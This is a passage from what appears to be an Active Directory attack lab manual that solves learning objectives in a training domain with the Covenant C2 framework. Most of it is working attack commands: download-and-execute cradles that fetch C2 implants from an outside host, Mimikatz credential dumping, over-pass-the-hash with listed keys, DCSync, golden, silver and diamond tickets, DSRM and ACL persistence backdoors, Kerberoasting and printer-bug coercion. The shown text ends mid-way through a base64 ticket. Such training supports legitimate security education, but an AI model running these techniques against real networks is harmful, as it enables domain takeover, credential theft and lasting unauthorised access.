We were not able to gain access on dcorp-adminsrv.dollarcorp.moneycorp.local machine as
seen in the above screenshot we got an error of core type means we are operating in
Constrained Language Mode. So, let us enumerate the machine over PSRemoting.
Check the PowerShell language Mode
• Command
PowerShell Invoke-Command -ScriptBlock
{$ExecutionContext.SessionState.LanguageMode} -ComputerName
dcorp-adminsrv.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 75
We can see in the above screenshot that we are running in a Constrained Language Mode.
So, let us enumerate the AppLocker Policy.
• Command
PowerShell Invoke-Command -ScriptBlock {reg query
HKLM\Software\Policies\Microsoft\Windows\SRPV2} -ComputerName
dcorp-adminsrv.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 76
• Command
PowerShell Invoke-Command -ScriptBlock {Get-AppLockerPolicy -
Effective | select -ExpandProperty RuleCollections} -ComputerName
dcorp-adminsrv.dollarcorp.moneycorp.local
Looks like Applocker is configured. After going through the policies, we can understand that
Microsoft Signed binaries and scripts are allowed for all the users but nothing else.
However, this rule is overly permissive.
A default rule is enabled that allows everyone to run scripts from the C:\ProgramFiles folder!
Here, everyone can run scripts from the Program Files directory. That means, we can drop
the PowerShell script in the Program Files directory and execute the same.
AlteredSecurity Attacking and Defending Active Directory 77
Download the StudentVMGrunt.ps1 PowerShell script and save it in the Program Files
directory.
• Command
PowerShell Invoke-Command -ScriptBlock {iwr -UseBasicParsing
http://172.16.100.2/StudentVMGrunt.ps1 -OutFile "C:\Program
Files\StudentVMGrunt.ps1"} -ComputerName dcorp-
adminsrv.dollarcorp.moneycorp.local
Let us check if the file is properly downloaded on the disk.
• Command
PowerShell Invoke-Command -ScriptBlock {ls "C:\Program Files\"} -
ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 78
Now, let us execute the file and check if we can get a new grunt on the machine.
• Command
PowerShell Invoke-Command -ScriptBlock {powershell.exe -File
"C:\Program Files\StudentVMGrunt.ps1"} -ComputerName dcorp-
adminsrv.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 79
Now, since we have got the access of the dcorp-
adminsrv.dollarcorp.moneycorp.local machine. We can now extract the credentials from
the machine using the Built-in task Mimikatz. But first thing that we need to do is execute
the built-in command BypassAmsi command.
• Command
Mimikatz "sekurlsa::ekeys"
AlteredSecurity Attacking and Defending Active Directory 80
As we can see we have got 3 user account hash and keys.
We will leverage srvadmin user account AES key to perform OverPass-The-Hash attack and
gain a new grunt with srvadmin user privilege. We will use Mimikatz Built-in task to perform
the OverPass-The-Hash attack. We will use the System privilege grunt of the Student VM to
perform the OverPass-The-Hash attack.
Download the StudentVMGrunt.exe file on the Student VM and save the file to the disk.
In our case we already have the file on the disk hence we will use the same file. If the file is
not present we can use the below command to download the same.
Note: - We can also use the Upload option to upload our Grunt File on the machine.
• Command
PowerShell iwr -UseBasicParsing
http://172.16.100.2/StudentVMGrunt.exe -OutFile
C:\Users\Public\Downloads\StudentVMGrunt.exe
AlteredSecurity Attacking and Defending Active Directory 81
Below are the steps to perform Over-Pass-The-Hash attack using Mimikatz and execute the
Grunt with srvadmin privilege.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select Mimikatz from the GruntTask.
4. Enter "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local
/aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1db
b4 /run:C:\Users\Public\Downloads\StudentVMGrunt.exe" value in the Command
field.
5. Click on the Task button.
AlteredSecurity Attacking and Defending Active Directory 82
The new Grunt is connected back to our Covenant C2 with srvadmin user token.
AlteredSecurity Attacking and Defending Active Directory 83
We need to add note in the New Grunt so that we can identify that it has token
of srvadmin user.
Steps
1. Click on the Grunt name in the Grunts page
2. Enter srvadmin user privilege value in Note field.
3. Click on Edit button
AlteredSecurity Attacking and Defending Active Directory 84
Now, let us use Find-PSRemotingLocalAdminAccess.ps1 to check if srvadmin has local
administrator privileges on any other machine in the domain where a domain admin session
is available. We will need to import the Find-PSRemotingLocalAdminAccess.ps1 PowerShell
script using PowerShellImport built-in task in covenant. But first thing that we need to do is
execute the built-in command BypassAmsi command.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the Find-PSRemotingLocalAdminAccess.ps1 PowerShell script.
5. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 85
• Command
PowerShell Find-PSRemotingLocalAdminAccess
AlteredSecurity Attacking and Defending Active Directory 86
We have local admin access on the dcorp-mgmt server as srvadmin and a session of
svcadmin is established on that machine. Let us download and execute the PowerShell
Launcher to get a new grunt of dcorp-mgmt machine.
• Command
PowerShell Invoke-Command -ScriptBlock {PowerShell -Sta -Nop -
Window Hidden -Command "IEX (iwr
'http://172.16.100.2/StudentVMGrunt.ps1' -UseBasicParsing)"} -
ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 87
We can now extract the credentials from the machine using the Built-in task Mimikatz. But
first thing that we need to do is execute the built-in command BypassAmsi command.
• Command
Mimikatz "sekurlsa::ekeys"
AlteredSecurity Attacking and Defending Active Directory 88
Now we need to perform OverPass-The-Hash and gain a new grunt again with the svcadmin
user’s privilege. All the below command needs to be executed on the Student VM from
elevated grunt.
Download the StudentVMGrunt.exe file on the Student VM and save the file to the disk.
In our case we already have the file on the disk hence we will use the same file. If the file is
not present we can use the below command to download the same.
Note:- We can also use the Upload option to upload our Grunt File on the machine.
• Command
PowerShell iwr -UseBasicParsing
http://172.16.100.226/StudentVMGrunt.exe -OutFile
C:\Users\Public\Downloads\StudentVMGrunt.exe
Below are the steps to perform Over-Pass-The-Hash attack using Mimikatz and execute the
Grunt with Domain Admin privilege.
Steps
o Note:- This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
AlteredSecurity Attacking and Defending Active Directory 89
3. Select Mimikatz from the GruntTask.
4. Enter "sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc70
11 /run:C:\Users\Public\Downloads\StudentVMGrunt.exe" value in the Command
field.
5. Click on the Task button.
The new Grunt is connected back to our Covenant C2 that has Domain Admin privileges!
AlteredSecurity Attacking and Defending Active Directory 90
We need to add note in the New Grunt to Identify that it has token of Domain Admin user.
Steps
1. Click on the Grunt name in the Grunts page
2. Enter svcadmin user privilege value in Note field.
3. Click on Edit button
AlteredSecurity Attacking and Defending Active Directory 91
Learning Objective 8
Task
• Extract secrets from the domain controller of dollarcorp.
• Using the secrets of krbtgt account, create a Golden ticket.
• Use the Golden ticket to (once again) get domain admin privileges from a machine.
Solution
Task - Extract secrets from the domain controller of dollarcorp.
From the previous exercise, we have domain admin privileges, we dumped hashes and keys
from dcorp-mgmt and used OverPass-The-Hash to get a new Grunt as domain admin -
svcadmin. Let us use the below command to dump all the hashes on the domain controller.
Remember that the below commands need to be executed from the new Grunt that is
running with privileges of DA on your machine 172.16.100.X.
To gain access on the Domain Controller we will leverages PSRemoting and execute
the StudentVMGrunt.ps1 PowerShell script. But first thing that we need to do is execute the
built-in command BypassAmsi command.
• Command
PowerShell Invoke-Command -ScriptBlock {PowerShell -Sta -Nop -
Window Hidden -Command "IEX (iwr
'http://172.16.100.2/StudentVMGrunt.ps1' -UseBasicParsing)"} -
ComputerName dcorp-dc.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 92
AlteredSecurity Attacking and Defending Active Directory 93
Now as we have access on the dcorp-dc let us extract the credentials using the Built-
in Mimikatz task. But first thing that we need to do is execute the built-in command
BypassAmsi command.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
AlteredSecurity Attacking and Defending Active Directory 94
3. Select Mimikatz from the GruntTask.
4. Enter "lsadump::lsa /patch" value in the Command field.
5. Click on the Task button.
AlteredSecurity Attacking and Defending Active Directory 95
To get NTLM hash and AES keys of the krbtgt account, we can use the DCSync attack. Run
the below command from process running as Domain Admin. Built-in Mimikatz task. Follow
the above steps and modify the value in the Command field as "lsadump::dcsync
/user:dcorp\krbtgt".
AlteredSecurity Attacking and Defending Active Directory 96
Task - Using the secrets of krbtgt account, create a Golden ticket.
Now, on any machine even if it is not part of the domain, we can use the information from
above command to create a Golden Ticket. Please note that the krbtgt account password
may be changed and the hash we get in the lab could be different from the one in this lab
manual.
We need to import the Mimikatz PowerShell script as the Built-in task in covenant kills the
existing grunt access while creating Golden Ticket. Follow the below mentioned steps to
Import PowerShell version of Mimikatz script. We will currently use the Student VM grunt
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the Invoke-Mimi.ps1 PowerShell script.
5. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 97
Use the below command to create the Golden Ticket.
• Command
PowerShell Invoke-Mimi -Command '"kerberos::golden
/User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-
5-21-719815819-3726368948-3917688648
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c
3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
AlteredSecurity Attacking and Defending Active Directory 98
Task - Use the Golden ticket to (once again) get domain admin privileges
from a machine.
Use the below command to access the filesystem on the domain controller.
• Command
ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
AlteredSecurity Attacking and Defending Active Directory 99
We can also run WMI commands on the DC:
• Command
PowerShell gwmi -Class win32_computersystem -ComputerName dcorp-
dc.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 100
Learning Objective 9
Task
• Try to get command execution on the domain controller by creating silver ticket for:
o HOST service
o WMI
Solution
Task - Get command execution on the domain controller by creating silver
ticket for HOST service.
From the information gathered in previous steps we have the hash for machine account of
the domain controller (dcorp-dc). Using the below command, we can create a Silver Ticket
that provides us access to the HOST service of DC. Please note that the hash of
dcorp−dc (RC4 in the below command) may be different in the lab. We will use the
PowerShell script of Mimikatz to create a Silver Ticket
• Command
PowerShell Invoke-Mimi -Command '"kerberos::golden
/domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-
3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:HOST /rc4:1be12164a06b817e834eb437dc8f581c
/user:Administrator /ptt"'
AlteredSecurity Attacking and Defending Active Directory 101
Create a new schedule task and execute the same to get the new grunt on the dcorp-
dc machine. We will leverage the StudentVMGrunt.exe that is already hosted.
• Command
ShellCmd schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local
/SC Weekly /RU "NT Authority\SYSTEM" /TN "User2" /TR
"powershell.exe -c 'iwr -UseBasicParsing
http://172.16.100.2/StudentVMGrunt.exe -OutFile
C:\Users\Public\StudentVMGrunt.exe; Start-Process
C:\Users\Public\StudentVMGrunt.exe;'"
AlteredSecurity Attacking and Defending Active Directory 102
Run the newly created schedule task on the dcorp-dc machine to gain new grunt on dcorp-
dc.
• Command
ShellCmd schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN
"User2"
AlteredSecurity Attacking and Defending Active Directory 103
Task - Get command execution on the domain controller by creating silver
ticket for WMI service.
For accessing WMI, we need to create two tickets – one for HOST service and another for
RPCSS.
Let us create the silver ticket for RPCSS Service as we have already created the ticket for
HOST service above.
• Command
PowerShell Invoke-Mimi -Command '"kerberos::golden
/domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-
3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:RPCSS /rc4:1be12164a06b817e834eb437dc8f581c
/user:Administrator /ptt"'
AlteredSecurity Attacking and Defending Active Directory 104
Once both the tickets are created, we can run command on the DC using WMI.
• Command
PowerShell gwmi -Class win32_computersystem -ComputerName dcorp-
dc.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 105
Learning Objective 10
Task
• Use Domain Admin privileges obtained earlier to execute the Diamond Ticket attack.
Solution
Task - Use Domain Admin privileges obtained earlier to execute the Diamond
Ticket attack.
We can simply use the following Rubeus command to execute the attack. Note that the
current version of Rubeus in Covenant is the old build. We will need to use the new version
of Rubeus to inject the ticket. We will use the Assembly Task to perform the same. We will
be using the system privilege grunt on the Student VM to execute the below mentioned
commands.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
AlteredSecurity Attacking and Defending Active Directory 106
2. Click on the Task tab
3. Select Assembly from the GruntTask.
4. Browse the Rubeus.exe file.
5. Enter Rubeus.exe value in AssemblyName field.
6. Enter diamond
/krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda8
48 /user:student2 /password:PBKZZhYvtAQ5TYa4 /enctype:aes
/ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-
dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512
/createnetonly:C:\Users\Public\Downloads\StudentVMGrunt.exe /show /ptt value
in Parameters field.
7. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 107
AlteredSecurity Attacking and Defending Active Directory 108
We need to add note in the New Grunt so that we can identify that it has token
of administrator user.
Steps
1. Click on the Grunt name in the Grunts page
2. Enter administrator user privilege value in Note field.
3. Click on Edit button
AlteredSecurity Attacking and Defending Active Directory 109
AlteredSecurity Attacking and Defending Active Directory 110
Learning Objective 11
Task
• Use Domain Admin privileges obtained earlier to abuse the DSRM credential for
persistence.
Solution
Task - Use Domain Admin privileges obtained earlier to abuse the DSRM
credential for persistence.
We can persist with administrative access on the DC once we have Domain Admin privileges
by abusing the DSRM administrator. With the domain admin privileges obtained earlier, let
us extract the credentials from the SAM file from the DC. The Directory Services Restore
Mode (DSRM) password is mapped to the local Administrator on the DC. To extract
the DSRM we will leverage Built-in Mimikatz command. We will use our exiting grunt that
we have on dcorp-dc.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
AlteredSecurity Attacking and Defending Active Directory 111
2. Click on the Task tab
3. Select Mimikatz from the GruntTask.
4. Browse the "token::elevate" "lsadump::sam" PowerShell script.
5. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 112
The DSRM administrator is not allowed to logon to the DC from network. So, we need to
change the logon behavior for the account by modifying registry on the DC. We can use the
below mentioned command to modify the logon behavior for allowing network logon.
• Command
PowerShell New-ItemProperty
"HKLM:\System\CurrentControlSet\Control\Lsa\" -Name
"DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
AlteredSecurity Attacking and Defending Active Directory 113
Now from our Student VM grunt we can perform OverPass-The-Hash attack using Mimikatz
for the DSRM administrator. All the below command needs to be executed on the Student
VM from elevated grunt.
Download the StudentVMGrunt.exe file on the Student VM and save the file to the disk.
In our case we already have the file on the disk hence we will use the same file. If the file is
not present, we can use the below command to download the same.
Note: - We can also use the Upload option to upload our Grunt File on the machine.
• Command
PowerShell iwr -UseBasicParsing
http://172.16.100.2/StudentVMGrunt.exe -OutFile
C:\Users\Public\Downloads\StudentVMGrunt.exe
Below are the steps to perform OverPass-The-Hash attack using Mimikatz and execute the
Grunt with Domain Admin privilege.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
AlteredSecurity Attacking and Defending Active Directory 114
2. Click on the Task tab
3. Select Mimikatz from the GruntTask.
4. Enter "sekurlsa::pth /user:administrator /domain:dcorp-dc
/ntlm:a102ad5753f4c441e3af31c97fad86fd
/run:C:\Users\Public\Downloads\StudentVMGrunt.exe" value in the Command
field.
5. Click on the Task button.
AlteredSecurity Attacking and Defending Active Directory 115
The new Grunt is connected back to our Covenant C2 that has Administrator user privileges!
AlteredSecurity Attacking and Defending Active Directory 116
We need to add note in the New Grunt to Identify that it has token of Domain Admin user.
Steps
1. Click on the Grunt name in the Grunts page
2. Enter Grunt spawned with DSRM creds value in Note field.
3. Click on Edit button
AlteredSecurity Attacking and Defending Active Directory 117
We can now access the dcorp-dc directly from the new grunt.
• Command
ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
AlteredSecurity Attacking and Defending Active Directory 118
Learning Objective 12
Task
• Check if studentx has Replication (DCSync) rights.
• If yes, execute the DCSync attack to pull hashes of the krbtgt user.
• If no, add the replication rights for the studentx and execute the DCSync attack to pull
hashes of the krbtgt user.
Solution
Task - Check if studentx has Replication (DCSync) rights.
We can check if studentx has replication rights using the following PowerView command.
We will use Student VM to enumerate.
Note: - We might need to import the PowerView.ps1 script again.
• Command
PowerShell Get-DomainObjectAcl -SearchBase
"DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -
ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or
($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object
{$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName
$_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student2"}
AlteredSecurity Attacking and Defending Active Directory 119
AlteredSecurity Attacking and Defending Active Directory 120
Task - Add the replication rights for the studentx and execute the DCSync
attack to pull hashes of the krbtgt user.
As we can see in the above screenshot the output is blank means the student2 does not
have the rights to perform replication. Hence, we will grant those rights using the following
command from the dcorp-dc grunt. We will need to import PowerView.ps1 PowerShell
script to perform the activity. The steps for importing PowerView.ps1 PowerShell script can
be found in the above section.
AlteredSecurity Attacking and Defending Active Directory 121
• Command
PowerShell Add-DomainObjectAcl -TargetIdentity
'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student2
-Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -
TargetDomain dollarcorp.moneycorp.local -Verbose
Let us check for the rights once again from our normal student user grunt. In case if you get
any errors while trying the below command you can run RevertToSelf command and then
try to run the below command again.
• Command
PowerShell Get-DomainObjectAcl -SearchBase
"DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base -
ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get') -or
($_.ActiveDirectoryRights -match 'GenericAll')} | ForEach-Object
{$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName
$_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student2"}
AlteredSecurity Attacking and Defending Active Directory 122
As we can see above now the current user has the rights to perform DCSync attack. We will
use Built-in Mimikatz task to perform the DCSync attack to extract the KRBTGT account
hash.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
AlteredSecurity Attacking and Defending Active Directory 123
3. Select Mimikatz from the GruntTask.
4. Browse the "lsadump::dcsync /user:dcorp\krbtgt" PowerShell script.
5. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 124
Learning Objective 13
Task
• Modify security descriptors on dcorp-dc to get access using PowerShell remoting and
WMI without requiring administrator access.
• Retrieve machine account hash from dcorp-dc without using administrator access and
use that to execute a Silver Ticket attack to get code execution with WMI.
Solution
Task - Modify security descriptors on dcorp-dc to get access using PowerShell
remoting and WMI without requiring administrator access.
Once we have administrative privileges on a machine, we can modify security descriptors of
services to access the services without administrative privileges. Below command (to be run
as Domain Administrator) modifies the host security descriptors for WMI on the DC to allow
studentx access to WMI. To perform this task first we will need to import the Set-
RemoteWMI.ps1 PowerShell script. Follow the below mentioned steps and execute the
command.
Note:- Since the PSRemoting is not stable we will only look at WMI option.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
AlteredSecurity Attacking and Defending Active Directory 125
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the Set-RemoteWMI.ps1 PowerShell script.
5. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 126
• Command
PowerShell Set-RemoteWMI -UserName student2 -ComputerName dcorp-
dc.dollarcorp.moneycorp.local -namespace 'root\cimv2' -Verbose
Now, we can execute WMI queries on the DC as studentx. We will execute the below
mentioned command from the Student VM. Before we execute the WMI command let's
purge all the tickets.
AlteredSecurity Attacking and Defending Active Directory 127
• Command
PowerShell gwmi -class win32_operatingsystem -ComputerName dcorp-
dc.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 128
Task - Retrieve machine account hash from dcorp-dc without using
administrator access and use that to execute a Silver Ticket attack to get code
execution with WMI.
To retrieve machine account hash without DA, first we need to modify permissions on the
DC. We will need Domain Admin privilege to deploy the backdoor. We will use Add-
RemoteRegBackdoor.ps1 PowerShell script to grant the permissions.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the Add-RemoteRegBackdoor.ps1 PowerShell script.
5. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 129
• Command
PowerShell Add-RemoteRegBackdoor -ComputerName dcorp-
dc.dollarcorp.moneycorp.local -Trustee student2 -Verbose
AlteredSecurity Attacking and Defending Active Directory 130
Now, we can retrieve hash as studentx. We will execute the below mentioned command
from the Student VM. To extract the Machine Account Hash, we will
use RemoteHashRetrieval.ps1 PowerShell script.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the RemoteHashRetrieval.ps1 PowerShell script.
5. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 131
• Command
PowerShell Get-RemoteMachineAccountHash -ComputerName dcorp-
dc.dollarcorp.moneycorp.local -Verbose
Note: - In case if you face error as shown in the below screenshot while executing the above
command we can use another command to run the same.
AlteredSecurity Attacking and Defending Active Directory 132
• Command
ShellCmd PowerShell -c "IEX (Get-Content
C:\AD\Tools\amsibypass.txt -Raw); . C:\AD\Tools\RACE.ps1; Get-
RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose"
We can use the machine account hash to create Silver Tickets. Create Silver Tickets for HOST
and RPCSS using the machine account hash to execute WMI queries. We will use the
Student VM grunt to create the Silver Ticket.
Before injecting the ticket, we will need to create a new token using MakeToken and then
inject the ticket.
• Command
MakeToken Administrator dollarcorp.moneycorp.local dummypassword
AlteredSecurity Attacking and Defending Active Directory 133
Note: Import Invoke-Mimi.ps1 script if not imported.
• Command
PowerShell Invoke-Mimi -Command '"kerberos::golden
/domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-
3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:HOST /rc4:1be12164a06b817e834eb437dc8f581c
/user:Administrator /ptt"'
• Command
PowerShell Invoke-Mimikatz -Command '"kerberos::golden
/domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-
3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:RPCSS /rc4:1be12164a06b817e834eb437dc8f581c
/user:Administrator /ptt"'
AlteredSecurity Attacking and Defending Active Directory 134
So, now we have the tickets for HOST & RPCSS service to execute command using WMI on
the dcorp-dc machine.
• Command
PowerShell gwmi -Class win32_operatingsystem -ComputerName dcorp-
dc.dollarcorp.moneycorp.local
Once we have gained the access, we can execute RevertToSelf so that we restore our access
to our student user.
AlteredSecurity Attacking and Defending Active Directory 135
Learning Objective 14
Task
• Using the Kerberoast attack, crack password of a SQL server service account.
Solution
Task - Using the Kerberoast attack, crack password of a SQL server service
account.
We first need to find out services running with user accounts as the services running with
machine accounts have difficult passwords. We can use PowerView (Get-DomainUser -SPN)
or ActiveDirectory module for discovering such services. We will use Student VM for
executing the PowerView commands. To import the PowerView script please follow the
steps provided in the above section.
• Command
PowerShell Get-DomainUser -SPN
AlteredSecurity Attacking and Defending Active Directory 136
Neat! The svcadmin, which is a domain administrator has a SPN set! Let us retrieve the hash
for the svcadmin user using Rubeus Built-in task.
• Command
Rubeus kerberoast /user:svcadmin /simple /rc4opsec
AlteredSecurity Attacking and Defending Active Directory 137
As we can see that we have got the hash for the svcadmn user. We will save the hash value
in a file and then use Hashcat to crack the password. We will use 10k-worst-pass.txt as the
password list. The path of the password can differ.
• Command
hashcat -m 13100 svcadmin.txt Tools/kerberoast/10k-worst-pass.txt
AlteredSecurity Attacking and Defending Active Directory 138
Learning Objective 15
Task
• Find a server in the dcorp domain where Unconstrained Delegation is enabled.
• Compromise the server and escalate to Domain Admin privileges.
• Escalate to Enterprise Admins privileges by abusing Printer Bug!.
Solution
Task - Find a server in the dcorp domain where Unconstrained Delegation is
enabled.
We first need to find a server that has unconstrained delegation enabled. We will use
PowerView for enumeration
• Command
PowerShell Get-DomainComputer -Unconstrained | select -
ExpandProperty name
AlteredSecurity Attacking and Defending Active Directory 139
Task - Compromise the server and escalate to Domain Admin privileges.
Since the prerequisite for elevation using Unconstrained delegation is having admin access to the
machine, we need to compromise a user which has local admin access on dcorp-appsrv. Recall that
we extracted secrets of appadmin, srvadmin and websvc from dcorp-adminsrv. Let us check if
anyone of them have local admin privileges on dcorp-appsrv. First, we will try with appadmin and
Built-in task of Mimikatz to perform OverPass-The-Hash attack.
Download the StudentVMGrunt.exe file on the Student VM and save the file to the disk.
In our case we already have the file on the disk hence we will use the same file. If the file is
not present we can use the below command to download the same.
Note: - We can also use the Upload option to upload our Grunt File on the machine.
• Command
PowerShell iwr -UseBasicParsing
http://172.16.100.61/StudentVMGrunt.exe -OutFile
C:\Users\Public\Downloads\StudentVMGrunt.exe
Below are the steps to perform Over-Pass-The-Hash attack using Mimikatz and execute the
Grunt with appadmin privilege. We need to perform these steps using elevated privileges.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
AlteredSecurity Attacking and Defending Active Directory 140
2. Click on the Task tab
6. Select Mimikatz from the GruntTask.
7. Enter "sekurlsa::pth /user:appadmin /domain:dollarcorp.moneycorp.local
/aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4
cb /run:C:\Users\Public\Downloads\StudentVMGrunt.exe" value in the Command
field.
8. Click on the Task button.
AlteredSecurity Attacking and Defending Active Directory 141
The new Grunt is connected back to our Covenant C2 with appadmin user token.
AlteredSecurity Attacking and Defending Active Directory 142
We need to add note in the New Grunt so that we can identify that it has token
of appadmin user.
Steps
4. Click on the Grunt name in the Grunts page
5. Enter appadmin user privilege value in Note field.
6. Click on Edit button
AlteredSecurity Attacking and Defending Active Directory 143
Now, let us use Find-PSRemotingLocalAdminAccess.ps1 to check if appadmin has local
administrator privileges on any other machine in the domain where a domain admin session
is available. We will need to import the Find-PSRemotingLocalAdminAccess.ps1 PowerShell
script using PowerShellImport built-in task in covenant. But before that we need to run the
AMSI Bypass using the built-in command BypassAmsi.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
AlteredSecurity Attacking and Defending Active Directory 144
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the Find-PSRemotingLocalAdminAccess.ps1 PowerShell script.
5. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 145
• Command
PowerShell Find-PSRemotingLocalAdminAccess
Let us gain the access to dcorp-appsrv server using PSRemoting.
• Command
PowerShell Invoke-Command -ScriptBlock {PowerShell -Sta -Nop -
Window Hidden -Command "IEX (iwr
'http://172.16.100.2/StudentVMGrunt.ps1' -UseBasicParsing)"} -
ComputerName dcorp-appsrv.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 146
Now, let us abuse the Printer Bug by leveraging Rubeus and MS-RPRN or Petitpotam to
force the authentication from dcorp-dc$ account. First, we will start the Rubeus listener on
dcorp-appsrv machine. But before that we need to run the AMSI Bypass using the built-in
command BypassAmsi.
• Command
Rubeus monitor /targetuser:DCORP-DC$ /interval:5 /nowrap
AlteredSecurity Attacking and Defending Active Directory 147
AlteredSecurity Attacking and Defending Active Directory 148
Now, from the Student VM grunt we will force the authentication from dcorp-dc$ using MS-
RPRN.exe file.
• Command
ShellCmd C:\AD\Tools\MS-RPRN.exe \\dcorp-
dc.dollarcorp.moneycorp.local \\dcorp-
appsrv.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 149
On the Rubeus listener, we can see the TGT of dcorp-dc$
Once we get our ticket we need to kill the Rubeus task. First, we need to list all the running task
and the use the Task id to kill the task as shown in the below screenshot.
AlteredSecurity Attacking and Defending Active Directory 150
So now let us inject the ticket in the StudentVM grunt. Before injecting the ticket, we will
need to create a new token using MakeToken and then inject the ticket.
• Command
MakeToken DCORP-DC$ dollarcorp.moneycorp.local dummypassword
AlteredSecurity Attacking and Defending Active Directory 151
• Command
Rubeus ptt
/ticket:doIGRTCCBkGgAwIBBaEDAgEWooIFGjCCBRZhggUSMIIFDqADAgEFoRwbG
kRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gx
pET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBLYwggSyoAMCARKhAwIBAqKCBKQ
EggSgeGH18/ddcoOWtWEIyvoUoBcMKx3w+M7JC1XrZma9RjXa3hta1CViGVLjzPrA
t4mxmYH3ZdWhI6kaJdr/SxPLh8AsCI37bSRsqLNYMPuN5jZp5UaAtG/xFCxPyO502
9YX84HxH/dXd2YAGaZiQ31GFcFNjryTMklVD2HjAc56wxvj2baY4M/j9/3oOfq725
